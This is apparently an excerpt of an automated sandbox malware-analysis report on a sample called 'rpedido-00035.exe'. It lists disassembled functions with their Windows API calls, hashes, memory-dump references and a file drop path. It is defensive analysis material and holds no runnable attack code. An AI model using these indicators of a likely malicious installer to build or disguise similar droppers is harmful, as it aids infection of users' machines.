                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: b4474b7c365b70f9dc7c58f3b4c8f6c607978000052ce3e09dedc8896c81aea9
                                                          • Instruction ID: 78872c6594437c8f6fb94a475087433cb7c5ddb6828dda6eb17a8edff69df0b5
                                                          • Opcode Fuzzy Hash: b4474b7c365b70f9dc7c58f3b4c8f6c607978000052ce3e09dedc8896c81aea9
                                                          • Instruction Fuzzy Hash: 93F0F072905021DBCB20FBA58E848DE72B09F01328B2101BFF101F21D1C77C0E418AAE
                                                          Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
                                                          • Instruction ID: adf76bd272608bb1b99769d9a9b05885636640fbfa2c3f91bbd7a8ebdab0685d
                                                          • Opcode Fuzzy Hash: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
                                                          • Instruction Fuzzy Hash: 45D0A773F141008BD720EBB8BE8945E73F8E7803193208837E102F11D1E578C8928A2D
                                                          Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: AllocGlobal
                                                          • String ID:
                                                          • API String ID: 3761449716-0
                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

                                                          Non-executed Functions

                                                          Function 00405553 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 004055B1
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004055C0
                                                          • GetClientRect.USER32(?,?), ref: 004055FD
                                                          • GetSystemMetrics.USER32(00000002), ref: 00405604
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405625
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405636
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405649
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405657
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040566A
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040568C
                                                          • ShowWindow.USER32(?,00000008), ref: 004056A0
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004056C1
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004056D1
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004056EA
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004056F6
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004055CF
                                                            • Part of subcall function 0040437A: SendMessageW.USER32(00000028,?,?,004041A5), ref: 00404388
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405713
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000054E7,00000000), ref: 00405721
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405728
                                                          • ShowWindow.USER32(00000000), ref: 0040574C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405751
                                                          • ShowWindow.USER32(00000008), ref: 0040579B
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057CF
                                                          • CreatePopupMenu.USER32 ref: 004057E0
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004057F4
                                                          • GetWindowRect.USER32(?,?), ref: 00405814
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040582D
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405865
                                                          • OpenClipboard.USER32(00000000), ref: 00405875
                                                          • EmptyClipboard.USER32 ref: 0040587B
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405891
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A5
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004058C5
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004058D0
                                                          • CloseClipboard.USER32 ref: 004058D6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: (7B${
                                                          • API String ID: 590372296-525222780
                                                          • Opcode ID: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
                                                          • Instruction ID: f8c5fe522ebc9739dae7df13929d3a15495bf3740f19f89270c8c50aa4207807
                                                          • Opcode Fuzzy Hash: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
                                                          • Instruction Fuzzy Hash: AFB15870900608FFDB11AFA0DD85AAE7B79FB44354F00847AFA45B61A0CB754E51DF68
                                                          Function 00404D90 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404DA8
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404DB3
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DFD
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404E10
                                                          • SetWindowLongW.USER32(?,000000FC,00405388), ref: 00404E29
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E3D
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E4F
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404E65
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E71
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E83
                                                          • DeleteObject.GDI32(00000000), ref: 00404E86
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EB1
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EBD
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F53
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404F7E
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F92
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404FC1
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FCF
                                                          • ShowWindow.USER32(?,00000005), ref: 00404FE0
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 004050DD
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405142
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405157
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040517B
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040519B
                                                          • ImageList_Destroy.COMCTL32(?), ref: 004051B0
                                                          • GlobalFree.KERNEL32(?), ref: 004051C0
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405239
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004052E2
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004052F1
                                                          • InvalidateRect.USER32(?,00000000,?), ref: 00405311
                                                          • ShowWindow.USER32(?,00000000), ref: 0040535F
                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040536A
                                                          • ShowWindow.USER32(00000000), ref: 00405371
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                          • Instruction ID: 31ae2990ecb9e768136dc40aca02b7f59ce629e1f3cadc681249b7cbd6abf0de
                                                          • Opcode Fuzzy Hash: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                          • Instruction Fuzzy Hash: 09027DB0A00609EFDB209F54DC45AAE7BB5FB44354F10817AE610BA2E0C7798E52CF58
                                                          Function 00404814 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404863
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0040488D
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040493E
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404949
                                                          • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 0040497B
                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404987
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404999
                                                            • Part of subcall function 004059F6: GetDlgItemTextW.USER32(?,?,00000400,004049D0), ref: 00405A09
                                                            • Part of subcall function 00406644: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rpedido-00035.exe",00403464,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                            • Part of subcall function 00406644: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                            • Part of subcall function 00406644: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rpedido-00035.exe",00403464,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                            • Part of subcall function 00406644: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rpedido-00035.exe",00403464,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                          • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A5C
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A77
                                                            • Part of subcall function 00404BD0: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                            • Part of subcall function 00404BD0: wsprintfW.USER32 ref: 00404C7A
                                                            • Part of subcall function 00404BD0: SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: (7B$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call
                                                          • API String ID: 2624150263-212780734
                                                          • Opcode ID: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                          • Instruction ID: 8d8d1438250e4d518a9e2371570913b63a9457987511b3c3302aefac7d34506d
                                                          • Opcode Fuzzy Hash: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                          • Instruction Fuzzy Hash: B3A184F1A00209ABDB119FA5CD45AAF77B8EF84314F14843BFA01B62D1D77C99418B6D
                                                          Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins, xrefs: 004021BD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins
                                                          • API String ID: 542301482-3607167448
                                                          • Opcode ID: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
                                                          • Instruction ID: fcf7de762e0310186ccf97c85ab7d5ba58e988de4da68cff16f28a22b081737a
                                                          • Opcode Fuzzy Hash: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
                                                          • Instruction Fuzzy Hash: EE414A75A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                          Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
                                                          • Instruction ID: 1506565ccd7b679c7f55cec76d0c208d7a3b57e4c41f2eb52868ec6bdbdc004a
                                                          • Opcode Fuzzy Hash: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
                                                          • Instruction Fuzzy Hash: 38F05E71A04104ABD710EBA4DA499ADB368EF00314F2005BBF541F21D1D7B84D919B2A
                                                          Function 00403E6C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA8
                                                          • ShowWindow.USER32(?), ref: 00403EC5
                                                          • DestroyWindow.USER32 ref: 00403ED9
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF5
                                                          • GetDlgItem.USER32(?,?), ref: 00403F16
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F2A
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403F31
                                                          • GetDlgItem.USER32(?,?), ref: 00403FDF
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403FE9
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404003
                                                          • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404054
                                                          • GetDlgItem.USER32(?,00000003), ref: 004040FA
                                                          • ShowWindow.USER32(00000000,?), ref: 0040411B
                                                          • EnableWindow.USER32(?,?), ref: 0040412D
                                                          • EnableWindow.USER32(?,?), ref: 00404148
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040415E
                                                          • EnableMenuItem.USER32(00000000), ref: 00404165
                                                          • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040417D
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404190
                                                          • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041BA
                                                          • SetWindowTextW.USER32(?,00423728), ref: 004041CE
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404302
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID: (7B
                                                          • API String ID: 184305955-3251261122
                                                          • Opcode ID: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                          • Instruction ID: 85a8b1cb5875a9f0130709c86f20b78f231723f1bf47f2e7597622744019d293
                                                          • Opcode Fuzzy Hash: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                          • Instruction Fuzzy Hash: 88C1A1B1640200FFDB216F61EE85D2B3BA8EB95305F40053EFA41B21F0CB7959529B6E
                                                          Function 004044E2 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404580
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404594
                                                          • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045B1
                                                          • GetSysColor.USER32(?), ref: 004045C2
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045D0
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045DE
                                                          • lstrlenW.KERNEL32(?), ref: 004045E3
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045F0
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404605
                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040465E
                                                          • SendMessageW.USER32(00000000), ref: 00404665
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404690
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046D3
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004046E1
                                                          • SetCursor.USER32(00000000), ref: 004046E4
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004046FD
                                                          • SetCursor.USER32(00000000), ref: 00404700
                                                          • SendMessageW.USER32(00000111,?,00000000), ref: 0040472F
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404741
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: Call$N$YD@
                                                          • API String ID: 3103080414-3276248472
